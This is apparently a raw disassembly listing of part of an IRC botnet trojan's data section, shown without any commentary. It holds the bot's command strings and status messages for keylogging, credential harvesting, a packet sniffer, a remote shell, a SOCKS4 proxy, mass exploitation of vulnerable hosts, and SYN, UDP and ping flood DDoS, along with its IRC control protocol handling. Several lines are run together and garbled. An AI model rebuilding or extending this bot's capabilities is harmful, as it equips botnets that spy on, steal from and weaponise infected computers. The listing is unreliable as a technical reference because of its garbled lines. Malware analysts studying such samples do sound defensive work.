dword_435DA0 dd 28026502h, 62302E31h, 20282029h, 2E74656Eh, 1F641F6Dh
; DATA XREF: sub_40CD3A+1E14�o
dd 2029206Ch, 2BBBB02h
aFailedToLoadAd db ' Failed to load advapi32.dll or netapi32.dll.',0
align 4
aBox_net db 'box.net',0 ; DATA XREF: sub_40CD3A+1DF0�o
align 8
unk_435DF8 db 2 ; DATA XREF: sub_40CD3A+1DBF�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 6Bh ; k
db 65h, 79h, 6Ch
db 6Fh ; o
db 67h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToSta_25 db ' Failed to start logging thread, error: <%d>.',0
align 4
unk_435E48 db 2 ; DATA XREF: sub_40CD3A+1D66�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 6Bh ; k
db 65h, 79h, 6Ch
db 6Fh ; o
db 67h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aKeyLoggerActiv db ' Key logger active.',0
unk_435E7C db 2 ; DATA XREF: sub_40CD3A+1CE5�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 6Bh ; k
db 65h, 79h, 6Ch
db 6Fh ; o
db 67h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aAlreadyRunni_1 db ' Already running.',0
align 10h
unk_435EB0 db 2 ; DATA XREF: sub_40CD3A:loc_40EA09�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 6Bh ; k
db 65h, 79h, 6Ch
db 6Fh ; o
db 67h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aNoKeyLoggerThr db ' No key logger thread found.',0
align 10h
unk_435EF0 db 2 ; DATA XREF: sub_40CD3A+1CC5�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 6Bh ; k
db 65h, 79h, 6Ch
db 6Fh ; o
db 67h, 2Eh, 6Dh
db 1Fh
db 64h, 1Fh, 6Ch
db 20h
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aKeyLoggerStopp db ' Key logger stopped. (%d thread(s) stopped.)',0
align 10h
aBox_keylog db 'box.keylog',0 ; DATA XREF: sub_40CD3A+1C6B�o
align 4
unk_435F4C db 2 ; DATA XREF: sub_40CD3A:loc_40E998�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aNoCarnivoreThr db 'No Carnivore thread found.',0
align 4
unk_435F88 db 2 ; DATA XREF: sub_40CD3A+1C54�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aCarnivoreStopp db 'Carnivore stopped. (%d thread(s) stopped.)',0
align 4
aOff db 'off',0 ; DATA XREF: sub_40CD3A+1C31�o
; sub_40CD3A+1CA2�o
unk_435FD8 db 2 ; DATA XREF: sub_40CD3A+1C11�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToSta_26 db 'Failed to start sniffer thread, error: <%d>.',0
align 4
unk_436028 db 2 ; DATA XREF: sub_40CD3A+1BB8�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aCarnivorePacke db 'Carnivore packet sniffer active.',0
align 4
unk_43606C db 2 ; DATA XREF: sub_40CD3A+1B54�o
db 65h, 2, 28h
db 31h ; 1
db 2Eh, 30h, 62h
db 29h ; )
db 20h, 28h, 20h
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 2Eh, 6Dh, 1Fh
db 64h ; d
db 1Fh, 6Ch, 20h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aAlreadyRunni_2 db 'Already running.',0
align 10h
aOn db 'on',0 ; DATA XREF: sub_40CD3A+1B34�o
; sub_40CD3A+1C80�o
align 4
aSniff db 'sniff',0 ; DATA XREF: sub_40CD3A+1B1F�o
align 4
aBox_rf db 'box.rf',0 ; DATA XREF: sub_40CD3A+1B08�o
align 4
aBox_readfile db 'box.readfile',0 ; DATA XREF: sub_40CD3A+1AF1�o
align 4
aBox_cm db 'box.cm',0 ; DATA XREF: sub_40CD3A+1ADA�o
align 4
aBox_cmd db 'box.cmd',0 ; DATA XREF: sub_40CD3A+1AC3�o
aMirc_cmd db 'mirc.cmd',0 ; DATA XREF: sub_40CD3A+1A95�o
; sub_40CD3A+1AAC�o
align 10h
aEnz_v db 'enz.v',0 ; DATA XREF: sub_40CD3A+1A7E�o
align 4
aEnz_visit db 'enz.visit',0 ; DATA XREF: sub_40CD3A+1A67�o
align 4
aBox_fl db 'box.fl',0 ; DATA XREF: sub_40CD3A+1A50�o
align 4
aBox_filelist db 'box.filelist',0 ; DATA XREF: sub_40CD3A+1A39�o
align 4
aDcc_gt db 'dcc.gt',0 ; DATA XREF: sub_40CD3A+1A22�o
align 4
aDcc_get db 'dcc.get',0 ; DATA XREF: sub_40CD3A+1A0B�o
aBox_del db 'box.del',0 ; DATA XREF: sub_40CD3A+19F4�o
aBox_delete db 'box.delete',0 ; DATA XREF: sub_40CD3A+19DD�o
align 10h
aBox_pkid db 'box.pkid',0 ; DATA XREF: sub_40CD3A+19C6�o
align 4
aBox_prockillid db 'box.prockillid',0 ; DATA XREF: sub_40CD3A+19AF�o
align 4
aBox_kpn db 'box.kpn',0 ; DATA XREF: sub_40CD3A+1998�o
aBox_killprocna db 'box.killprocname',0 ; DATA XREF: sub_40CD3A+1981�o
align 4
aEnz_dn db 'enz.dn',0 ; DATA XREF: sub_40CD3A+196A�o
align 10h
aEnz_dns db 'enz.dns',0 ; DATA XREF: sub_40CD3A+1953�o
aEnz_se db 'enz.se',0 ; DATA XREF: sub_40CD3A+193C�o
align 10h
aEnz_setserve db 'enz.setserve',0 ; DATA XREF: sub_40CD3A+1925�o
align 10h
aBox_o db 'box.o',0 ; DATA XREF: sub_40CD3A+190E�o
align 4
aBox_open db 'box.open',0 ; DATA XREF: sub_40CD3A+18F7�o
align 4
aEnz_pr db 'enz.pr',0 ; DATA XREF: sub_40CD3A+18E0�o
align 4
aEnz_prefix db 'enz.prefix',0 ; DATA XREF: sub_40CD3A+18C9�o
align 4
aClone_rn db 'clone.rn',0 ; DATA XREF: sub_40CD3A+18B2�o
align 4
aClone_rndnick db 'clone.rndnick',0 ; DATA XREF: sub_40CD3A+189B�o
align 4
aClone_q db 'clone.q',0 ; DATA XREF: sub_40CD3A+1884�o
aClone_quit db 'clone.quit',0 ; DATA XREF: sub_40CD3A+186D�o
align 4
aThreads_k db 'threads.k',0 ; DATA XREF: sub_40CD3A+1856�o
align 4
aThreads_kill db 'threads.kill',0 ; DATA XREF: sub_40CD3A+183F�o
align 4
aEnz_r db 'enz.r',0 ; DATA XREF: sub_40CD3A+1828�o
align 4
aEnz_raw db 'enz.raw',0 ; DATA XREF: sub_40CD3A+1811�o
aEnz_pt db 'enz.pt',0 ; DATA XREF: sub_40CD3A+17FA�o
align 4
aEnz_part db 'enz.part',0 ; DATA XREF: sub_40CD3A+17E3�o
align 4
aEnz_j db 'enz.j',0 ; DATA XREF: sub_40CD3A+17CC�o
align 10h
aEnz_join db 'enz.join',0 ; DATA XREF: sub_40CD3A+17B5�o
align 4
aEnz_n db 'enz.n',0 ; DATA XREF: sub_40CD3A+179E�o
align 4
aEnz_nick db 'enz.nick',0 ; DATA XREF: sub_40CD3A+1787�o
align 10h
aVall db 'vall',0 ; DATA XREF: sub_40CD3A+1761�o
align 4
aVuln_massexplo db 'vuln.massexploit',0 ; DATA XREF: sub_40CD3A+174C�o
align 4
aServer_tf_on db 'server.tf.on',0 ; DATA XREF: sub_40CD3A+1737�o
align 4
aServer_tftp_on db 'server.tftp.on',0 ; DATA XREF: sub_40CD3A+1722�o
align 4
aServer_web_on db 'server.web.on',0 ; DATA XREF: sub_40CD3A+170D�o
align 4
aServer_httpd_o db 'server.httpd.on',0 ; DATA XREF: sub_40CD3A+16F8�o
aVuln_cip db 'vuln.cip',0 ; DATA XREF: sub_40CD3A+16E3�o
align 4
aVuln_currentip db 'vuln.currentip',0 ; DATA XREF: sub_40CD3A+16CE�o
align 4
aUtil_fdns db 'util.fdns',0 ; DATA XREF: sub_40CD3A+16B9�o
align 4
aUtil_flushdns db 'util.flushdns',0 ; DATA XREF: sub_40CD3A+16A4�o
align 4
aUtil_farp db 'util.farp',0 ; DATA XREF: sub_40CD3A+168F�o
align 10h
aUtil_flusharp db 'util.flusharp',0 ; DATA XREF: sub_40CD3A+167A�o
align 10h
aBox_gc db 'box.gc',0 ; DATA XREF: sub_40CD3A+1665�o
align 4
aBox_getclip db 'box.getclip',0 ; DATA XREF: sub_40CD3A+1650�o
dword_436314 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+1645�o
dd 2029206Ch, 2BBBB02h
aLoginListCompl db ' Login list complete.',0
align 4
aD_S db '%d. %s',0 ; DATA XREF: sub_40CD3A+1611�o
; sub_414E97+46�o
align 10h
aEmpty db '<Empty>',0 ; DATA XREF: sub_40CD3A+1604�o
aLoginList db '-[Login List]-',0 ; DATA XREF: sub_40CD3A+15E2�o
align 4
aEnz_who db 'enz.who',0 ; DATA XREF: sub_40CD3A+15C9�o
aCmd db '[CMD]',0 ; DATA XREF: sub_40CD3A+15BE�o
align 4
aRemoteShell db 'Remote shell',0 ; DATA XREF: sub_40CD3A+15B9�o
align 4
aBox_ocmd_off db 'box.ocmd.off',0 ; DATA XREF: sub_40CD3A+15A0�o
align 4
aBox_ocmd db 'box.ocmd',0 ; DATA XREF: sub_40CD3A+158B�o
align 4
aBox_opencmd db 'box.opencmd',0 ; DATA XREF: sub_40CD3A+1576�o
aBox_dll db 'box.dll',0 ; DATA XREF: sub_40CD3A+1561�o
aBox_testdlls db 'box.testdlls',0 ; DATA XREF: sub_40CD3A+154C�o
align 4
aBox_drv db 'box.drv',0 ; DATA XREF: sub_40CD3A+1537�o
aBox_driveinfo db 'box.driveinfo',0 ; DATA XREF: sub_40CD3A+1522�o
align 10h
aBox_up db 'box.up',0 ; DATA XREF: sub_40CD3A+150D�o
align 4
aBox_uptime db 'box.uptime',0 ; DATA XREF: sub_40CD3A+14F8�o
align 4
aBox_key db 'box.key',0 ; DATA XREF: sub_40CD3A+14E3�o
aBox_harvest db 'box.harvest',0 ; DATA XREF: sub_40CD3A+14CE�o
aBox_ps db 'box.ps',0 ; DATA XREF: sub_40CD3A+14B9�o
align 10h
aBox_procs db 'box.procs',0 ; DATA XREF: sub_40CD3A+14A4�o
align 4
aEnz_b3g db 'enz.b3g',0 ; DATA XREF: sub_40CD3A+148F�o
aEnz_beg0ne db 'enz.beg0ne',0 ; DATA XREF: sub_40CD3A+147A�o
align 10h
aBox_si db 'box.si',0 ; DATA XREF: sub_40CD3A+1465�o
align 4
aBox_sysinfo db 'box.sysinfo',0 ; DATA XREF: sub_40CD3A+1450�o
aBox_ni db 'box.ni',0 ; DATA XREF: sub_40CD3A+143B�o
align 4
aBox_netinfo db 'box.netinfo',0 ; DATA XREF: sub_40CD3A+1426�o
aUtil_clg db 'util.clg',0 ; DATA XREF: sub_40CD3A+1411�o
align 4
aUtil_clearlog db 'util.clearlog',0 ; DATA XREF: sub_40CD3A+13FC�o
align 4
aEnz_lg db 'enz.lg',0 ; DATA XREF: sub_40CD3A+13E7�o
align 4
aEnz_log db 'enz.log',0 ; DATA XREF: sub_40CD3A+13D2�o
aEnz_al db 'enz.al',0 ; DATA XREF: sub_40CD3A+13BD�o
align 4
aEnz_aliases db 'enz.aliases',0 ; DATA XREF: sub_40CD3A+13A8�o
aThreads_l db 'threads.l',0 ; DATA XREF: sub_40CD3A+1393�o
align 4
aThreads_list db 'threads.list',0 ; DATA XREF: sub_40CD3A+137E�o
align 4
dword_4364B4 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+134A�o
dd 2029206Ch, 2BBBB02h
aFailedToReboot db ' Failed to reboot system.',0
align 4
dword_4364EC dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+1343�o
dd 2029206Ch, 2BBBB02h
aRebootingSyste db ' Rebooting system.',0
aBox_rebewt db 'box.rebewt',0 ; DATA XREF: sub_40CD3A+132C�o
align 4
aEnz_i db 'enz.i',0 ; DATA XREF: sub_40CD3A+1317�o
align 10h
aEnz_id db 'enz.id',0 ; DATA XREF: sub_40CD3A+1302�o
align 4
aEnz_s db 'enz.s',0 ; DATA XREF: sub_40CD3A+12ED�o
align 10h
aEnz_status db 'enz.status',0 ; DATA XREF: sub_40CD3A+12D8�o
align 4
aEnz_t3rm1 db 'enz.t3rm1',0 ; DATA XREF: sub_40CD3A+12C3�o
align 4
aEnz_t3rm1nate db 'enz.t3rm1nate',0 ; DATA XREF: sub_40CD3A+12AE�o
align 4
aEnz_et3 db 'enz.et3',0 ; DATA XREF: sub_40CD3A+1299�o
aEnz_endt3rm db 'enz.endt3rm',0 ; DATA XREF: sub_40CD3A+1284�o
aEnz_rh4 db 'enz.rh4',0 ; DATA XREF: sub_40CD3A+126F�o
aEnz_reh4sh db 'enz.reh4sh',0 ; DATA XREF: sub_40CD3A+125A�o
align 10h
aVuln_st db 'vuln.st',0 ; DATA XREF: sub_40CD3A+1245�o
aVuln_stats db 'vuln.stats',0 ; DATA XREF: sub_40CD3A+1230�o
align 4
aExploitation db 'Exploitation',0 ; DATA XREF: sub_40CD3A+1225�o
align 4
aScan db 'Scan',0 ; DATA XREF: sub_40CD3A+1220�o
align 4
aVuln_stop db 'vuln.stop',0 ; DATA XREF: sub_40CD3A+1207�o
align 4
dword_4365C8 dd 65027302h, 1F727563h, 2E2E1F65h, 0aSecure_0 db 'Secure',0 ; DATA XREF: sub_40CD3A+11F7�o
align 10h
aLockdown_stop db 'lockdown.stop',0 ; DATA XREF: sub_40CD3A+11DE�o
align 10h
dword_4365F0 dd 6C026302h, 1F656E6Fh, 2E2E1F73h, 0aClone db 'Clone',0 ; DATA XREF: sub_40CD3A+11CE�o
align 4
aClone_off db 'clone.off',0 ; DATA XREF: sub_40CD3A+11B5�o
align 4
aBox_ps_off db 'box.ps.off',0 ; DATA XREF: sub_40CD3A+11A0�o
align 10h
aBox_procs_off db 'box.procs.off',0 ; DATA XREF: sub_40CD3A+118B�o
align 10h
aBox_ff_off db 'box.ff.off',0 ; DATA XREF: sub_40CD3A+1176�o
align 4
aBox_findfile_o db 'box.findfile.off',0 ; DATA XREF: sub_40CD3A+1161�o
align 10h
dword_436650 dd 66027402h, 641F7074h, 2E2E1FhaServer_tftp_of db 'server.tftp.off',0 ; DATA XREF: sub_40CD3A+1138�o
dword_43666C dd 69027002h, 1F671F6Eh, 2E2Ehdword_436678 dd 676E6950h, 6F6C6620h, 646Fhdword_436684 dd 736F6464h, 6E69702Eh, 666F2E67h, 66hdword_436694 dd 64027502h, 2E1F701Fh, 2Ehdword_4366A0 dd 20504455h, 6F6F6C66h, 64hdword_4366AC dd 736F6464h, 7064752Eh, 66666F2Eh, 0dword_4366BC dd 79027302h, 2E1F6E1Fh, 2Ehdword_4366C8 dd 206E7953h, 6F6F6C66h, 64hdword_4366D4 dd 736F6464h, 6E79732Eh, 66666F2Eh, 0dword_4366E4 dd 64026402h, 1F731F6Fh, 2E2Ehdword_4366F0 dd 536F4444h, 6F6C6620h, 646Fhdword_4366FC dd 736F6464h, 66666F2Eh, 0dword_436708 dd 65027202h, 65726964h, 1F741F63h, 2E2Ehdword_436718 dd 20504354h, 69646572h, 74636572h, 0aServer_redirec db 'server.redirect.off',0 ; DATA XREF: sub_40CD3A+106B�o
dword_43673C dd 6F026C02h, 2E1F671Fh, 2Ehdword_436748 dd 20676F4Ch, 7473696Ch, 0dword_436754 dd 2E676F6Ch, 66666Fhdword_43675C dd 74026802h, 641F7074h, 2E2E1Fhdword_436768 dd 76726573h, 772E7265h, 6F2E6265h, 6666hdword_436778 dd 6C027202h, 6E69676Fh, 2E1F641Fh, 2EhaServer_rlogin_ db 'server.rlogin.off',0 ; DATA XREF: sub_40CD3A+FF0�o
align 4
dword_43679C dd 6F027302h, 1F736B63h, 2E2E1F34h, 0aServer db 'Server',0 ; DATA XREF: sub_40CD3A+FE0�o
; sub_40CD3A+1009�o ...
align 4
aServer_socks_0 db 'server.socks4.off',0 ; DATA XREF: sub_40CD3A+FC7�o
align 4
aServer_s4_on db 'server.s4.on',0 ; DATA XREF: sub_40CD3A+FB2�o
align 4
aServer_socks4_ db 'server.socks4.on',0 ; DATA XREF: sub_40CD3A+F9D�o
align 4
aLd_off db 'ld.off',0 ; DATA XREF: sub_40CD3A+F88�o
align 4
aLockdown_off db 'lockdown.off',0 ; DATA XREF: sub_40CD3A+F73�o
align 4
aLd_on db 'ld.on',0 ; DATA XREF: sub_40CD3A+F5E�o
align 4
aLockdown_on db 'lockdown.on',0 ; DATA XREF: sub_40CD3A+F49�o
aEnz_ver db 'enz.ver',0 ; DATA XREF: sub_40CD3A+F34�o
aEnz_version db 'enz.version',0 ; DATA XREF: sub_40CD3A+F1F�o
aEnz_lo db 'enz.lo',0 ; DATA XREF: sub_40CD3A+F0A�o
align 4
aEnz_logout db 'enz.logout',0 ; DATA XREF: sub_40CD3A+EF5�o
align 10h
aEnz_d db 'enz.d',0 ; DATA XREF: sub_40CD3A+EE0�o
align 4
aEnz_endsess db 'enz.endsess',0 ; DATA XREF: sub_40CD3A+ECB�o
aEnz_rn db 'enz.rn',0 ; DATA XREF: sub_40CD3A+EB6�o
align 4
aEnz_rndnick db 'enz.rndnick',0 ; DATA XREF: sub_40CD3A+E9E�o
a63 db '63',0 ; DATA XREF: sub_40CD3A+D7E�o
align 4
asc_43686C: ; DATA XREF: sub_40CD3A+D56�o
unicode 0, <)>,0
aChr db '$chr(',0 ; DATA XREF: sub_40CD3A+D1C�o
align 4
aServer_2 db '$server',0 ; DATA XREF: sub_40CD3A+D11�o
aRndnick db '$rndnick',0 ; DATA XREF: sub_40CD3A+D00�o
align 4
aChan db '$chan',0 ; DATA XREF: sub_40CD3A+CE4�o
align 4
aUser_2 db '$user',0 ; DATA XREF: sub_40CD3A+CD3�o
align 4
aMe_0 db '$me',0 ; DATA XREF: sub_40CD3A+CC1�o
aD_0 db '$%d',0 ; DATA XREF: sub_40CD3A+C4D�o
aD_1 db '$%d-',0 ; DATA XREF: sub_40CD3A+BA0�o
align 4
aHi_0 db 'hi',0 ; DATA XREF: sub_40CD3A+AC2�o
align 10h
aNewshit db 'newshit',0 ; DATA XREF: sub_40CD3A+AAA�o
dword_4368B8 dd 28026502h, 62302E31h, 20282029h, 2E636364h, 1F641F6Dh
; DATA XREF: sub_40CD3A+A87�o
dd 2029206Ch, 2BBBB02h
aChatFailedByUn db ' Chat failed by unauthorized user: %s.',0
align 10h
dword_436900 dd 28026502h, 62302E31h, 20282029h, 2E636364h, 1F641F6Dh
; DATA XREF: sub_40CD3A+A76�o
dd 2029206Ch, 2BBBB02h
aChatAlreadyAct db ' Chat already active with user: %s.',0
align 8
dword_436948 dd 28026502h, 62302E31h, 20282029h, 2E636364h, 1F641F6Dh
; DATA XREF: sub_40CD3A+A50�o
dd 2029206Ch, 2BBBB02h
aFailedToSta_27 db ' Failed to start chat thread, error: <%d>.',0
dword_436990 dd 28026502h, 62302E31h, 20282029h, 2E636364h, 1F641F6Dh
; DATA XREF: sub_40CD3A+9F7�o
dd 2029206Ch, 2BBBB02h
aChatFromUserS_ db ' Chat from user: %s.',0
align 4
aChat db 'CHAT',0 ; DATA XREF: sub_40CD3A+960�o
align 10h
dword_4369D0 dd 28026502h, 62302E31h, 20282029h, 2E636364h, 1F641F6Dh
; DATA XREF: sub_40CD3A+943�o
dd 2029206Ch, 2BBBB02h
aReceiveFileSFa db ' Receive file: ',27h,'%s',27h,' failed from unauthorized user: %s.',0
dword_436A24 dd 49544F4Eh, 25204543h, 13A2073h, 474E4950h, 1732520h
; DATA XREF: sub_40CD3A+913�o
dd 0A0Dh
dword_436A3C dd 4E495001h, 47haSHasJustVersio db '%s has just versioned me.',0 ; DATA XREF: sub_40CD3A+8A4�o
align 10h
dword_436A60 dd 49544F4Eh, 25204543h, 13A2073h, 53524556h, 204E4F49h
; DATA XREF: sub_40CD3A+88A�o
dd 0D017325h, 0Ah
dword_436A7C dd 52455601h, 4E4F4953h, 1dword_436A88 dd 28026502h, 62302E31h, 20282029h, 2E636364h, 1F641F6Dh
; DATA XREF: sub_40CD3A+74D�o
dd 2029206Ch, 2BBBB02h
aReceiveFileSFr db ' Receive file: ',27h,'%s',27h,' from user: %s.',0
aSend_0 db 'SEND',0 ; DATA XREF: sub_40CD3A+6AA�o
align 10h
dword_436AD0 dd 43434401h, 0 dword_436AD8 dd 323333h ; sub_40CD3A+AE4�o ...
aNotice db 'NOTICE',0 ; DATA XREF: sub_40CD3A+5ED�o
; sub_412BD1+F�o
align 4
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_40CD3A+5E1�o
; sub_412BD1+16�o
dword_436AEC dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+590�o
dd 2029206Ch, 2BBBB02h
aUserSLoggedOut db ' User: %s logged out.',0
align 10h
dword_436B20 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+570�o
dd 2029206Ch, 2BBBB02h
aJoinedChanne_0 db ' Joined channel: %s.',0
align 4
a353 db '353',0 ; DATA XREF: sub_40CD3A+539�o
aPart db 'PART',0 ; DATA XREF: sub_40CD3A+4EB�o
; sub_40CD3A+5AD�o
align 10h
aSS_1 db ':%s%s',0 ; DATA XREF: sub_40CD3A+4C3�o
align 4
aNick db 'NICK',0 ; DATA XREF: sub_40CD3A+3AF�o
align 10h
aNoticeSS db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_40CD3A+352�o
; sub_40CD3A+5D1�o
dword_436B80 dd 28026502h, 62302E31h, 20282029h, 2E7A6E65h, 1F641F6Dh
; DATA XREF: sub_40CD3A+339�o
; sub_40CD3A+5A05�o ...
dd 2029206Ch, 2BBBB02h
aUserSLoggedO_0 db ' User %s logged out.',0
align 4
aKick db 'KICK',0 ; DATA XREF: sub_40CD3A+2D6�o
align 4
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_40CD3A+27F�o
; sub_40CD3A+4A84�o ...
align 4
a433 db '433',0 ; DATA XREF: sub_40CD3A+257�o
a302 db '302',0 ; DATA XREF: sub_40CD3A+21C�o
aJoinSS db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40CD3A+1D6�o
; sub_40CD3A+39C�o ...
align 10h
aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: sub_40CD3A+1B5�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_40CD3A+19B�o
align 4
asc_436BF4 db ' :',0 ; DATA XREF: sub_40CD3A+86�o
; sub_40CD3A:loc_40D876�o
align 4
dword_436BF8 dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0 dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_436C44 dd 3000005h, 10h, 18h, 1, 3 dup(0); ---------------------------------------------------------------------------
loc_436C60: ; DATA XREF: sub_412A1D+118�o
mov al, 1
push edx
xchg eax, edi
retf 0D059h
; ---------------------------------------------------------------------------
db 11h
dd 0A000D5A8h, 51800DC9h, 0
dword_436C74 dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
; DATA XREF: sub_412A1D+13F�o
dword_436C88 dd 25207325h, 253A2073h, 0A0D73h, 0off_436C98 dd offset aAdd ; DATA XREF: sub_412C6C+6D�r
; sub_413053+50�r ...
; "Add"
off_436C9C dd offset aAdded ; DATA XREF: sub_412C6C+2D�r
; sub_413053+82�r ...
; "Added"
dword_436CA0 dd 0 dd offset aDelete_0 ; "Delete"
dd offset aDeleted ; "Deleted"
align 10h
dd offset aList_0 ; "List"
dd offset aListed ; "Listed"
dd 0
dd offset aStart_0 ; "Start"
dd offset aStarted ; "Started"
align 8
dd offset aStop_0 ; "Stop"
dd offset aStopped_0 ; "Stopped"
dd 1, 436D0Ch, 436D04h, 2, 436CF8h, 436CECh, 3, 746E6F43h
dd 65756E69h, 64h, 746E6F43h, 65756E69h, 0
aPaused db 'Paused',0
align 4
aPause_0 db 'Pause',0
align 4
aStopped_0 db 'Stopped',0 ; DATA XREF: .text:00436CCC�o
aStop_0 db 'Stop',0 ; DATA XREF: .text:00436CC8�o
align 4
aStarted db 'Started',0 ; DATA XREF: .text:00436CC0�o
aStart_0 db 'Start',0 ; DATA XREF: .text:00436CBC�o
align 4
aListed db 'Listed',0 ; DATA XREF: .text:00436CB4�o
align 4
aList_0 db 'List',0 ; DATA XREF: .text:00436CB0�o
align 4
aDeleted db 'Deleted',0 ; DATA XREF: .text:00436CA8�o
aDelete_0 db 'Delete',0 ; DATA XREF: .text:00436CA4�o
align 4
aAdded db 'Added',0 ; DATA XREF: .text:off_436C9C�o
align 4
aAdd db 'Add',0 ; DATA XREF: .text:off_436C98�o
dword_436D60 dd 28026502h, 62302E31h, 20282029h, 2E74656Eh, 1F641F6Dh
; DATA XREF: sub_412C6C+74�o
dd 2029206Ch, 2BBBB02h
aSNoServiceSpec db ' %s: No service specified.',0
dword_436D98 dd 28026502h, 62302E31h, 20282029h, 2E74656Eh, 1F641F6Dh
; DATA XREF: sub_412C6C+55�o
dd 2029206Ch, 2BBBB02h
aErrorWithServi db ' Error with service: ',27h,'%s',27h,'. %s',0
align 4
dword_436DD4 dd 28026502h, 62302E31h, 20282029h, 2E74656Eh, 1F641F6Dh
; DATA XREF: sub_412C6C+38�o
dd 2029206Ch, 2BBBB02h
aSServiceS_ db ' %s service: ',27h,'%s',27h,'.',0
aAnUnknownError db 'An unknown error occurred: <%ld>',0 ; DATA XREF: sub_412D95+12C�o
align 4
aTheSystemIsShu db 'The system is shutting down.',0 ; DATA XREF: sub_412D95:loc_412EAD�o
align 4
aTheServiceHasN db 'The service has not been started.',0 ; DATA XREF: sub_412D95:loc_412EA6�o
align 10h
aTheRequested_1 db 'The requested control code cannot be sent to the service because '
; DATA XREF: sub_412D95:loc_412E9F�o
db 'the state of the service.',0
align 4
aTheServiceHa_0 db 'The service has been marked for deletion.',0
; DATA XREF: sub_412D95:loc_412E98�o
align 4
aTheServiceCoul db 'The service could not be logged on. The account does not have the'
; DATA XREF: sub_412D95:loc_412E91�o
db ' correct access rights.',0
align 4
aTheSpecified_0 db 'The specified service does not exist.',0
; DATA XREF: sub_412D95:loc_412E8A�o
align 4
aTheServiceHasB db 'The service has been disabled.',0 ; DATA XREF: sub_412D95:loc_412E83�o
align 10h
aTheServiceDe_0 db 'The service depends on another service that has failed to start.',0
; DATA XREF: sub_412D95:loc_412E7C�o
align 8
aTheServiceDepe db 'The service depends on a service that does not exist or has been '
; DATA XREF: sub_412D95:loc_412E75�o
db 'marked for deletion.',0
align 10h
aTheSpecifiedDa db 'The specified database does not exist.',0
; DATA XREF: sub_412D95:loc_412E6E�o
align 4
aAnInstanceOfTh db 'An instance of the service is already running.',0
; DATA XREF: sub_412D95:loc_412E43�o
align 4
aTheRequested_0 db 'The requested control code is not valid, or it is unacceptable to'
; DATA XREF: sub_412D95:loc_412E3C�o
db ' the service.',0
align 4
aTheProcessForT db 'The process for the service was started, but it did not call Star'
; DATA XREF: sub_412D95:loc_412E35�o
db 'tServiceCtrlDispatcher.',0
align 4
aAThreadCouldNo db 'A thread could not be created for the service.',0
; DATA XREF: sub_412D95:loc_412E2E�o
align 4
aTheDatabaseIsL db 'The database is locked.',0 ; DATA XREF: sub_412D95+8F�o
align 10h
aTheServiceCann db 'The service cannot be stopped because other running services are '
; DATA XREF: sub_412D95:loc_412E03�o
db 'dependent on it.',0
align 4
